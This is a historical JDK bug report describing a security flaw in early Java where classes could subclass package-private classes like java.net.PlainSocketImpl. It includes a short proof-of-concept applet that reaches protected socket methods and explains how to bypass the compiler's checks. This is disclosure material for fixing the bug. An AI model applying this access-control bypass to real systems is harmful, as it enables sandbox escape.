Uploaded image for project: 'JDK'
  1. JDK
  2. JDK-1257354

classes can be subclass of classes to which they are not supposed to have access

    XMLWordPrintable

    Details

    • Subcomponent:
    • Resolved In Build:
      1.1
    • CPU:
      other
    • OS:
      solaris_2.5
    • Verification:
      Not verified

      Description

      This is a very serious security bug which is directly exploitable through getting access to
      all the protected methods in PlainSocketImpl. There may be other ways to exploit it.

      The problem is that any class can extend a class to which it is not supposed to have access
      (for example a class in package COM.microsoft can create a subclass of PlainSocketImpl,
      even though PlainSocketImpl is a friendly class in package java.net).

      The JDK compiler will not allow such a class to compile, but that is easily bypassed either
      by modifying bytecodes, or by recompiling PlainSocketImpl to be public, and then compiling
      the attack code.

      The following code will compile in an environment where java.net.PlainSocketImpl
      is public and will run in an environment where it is friendly.

      import java.applet.Applet;

      public class TestApplet extends Applet {

          public void init() {
      MySocketImpl msi = new MySocketImpl();
      msi.doNasty();
          }
      }
          

      public class MySocketImpl extends java.net.PlainSocketImpl {

          public void doNasty() {
      try {
      create(true);
      } catch (java.io.IOException e) {
      }
      System.out.println("just called create");
          }
          
      }
          

        Attachments

          Activity

            People

            Assignee:
            fyellinsunw Frank Yellin (Inactive)
            Reporter:
            brenaudsunw Benjamin Renaud (Inactive)
            Votes:
            0 Vote for this issue
            Watchers:
            0 Start watching this issue

              Dates

              Created:
              Updated:
              Resolved:
              Imported:
              Indexed: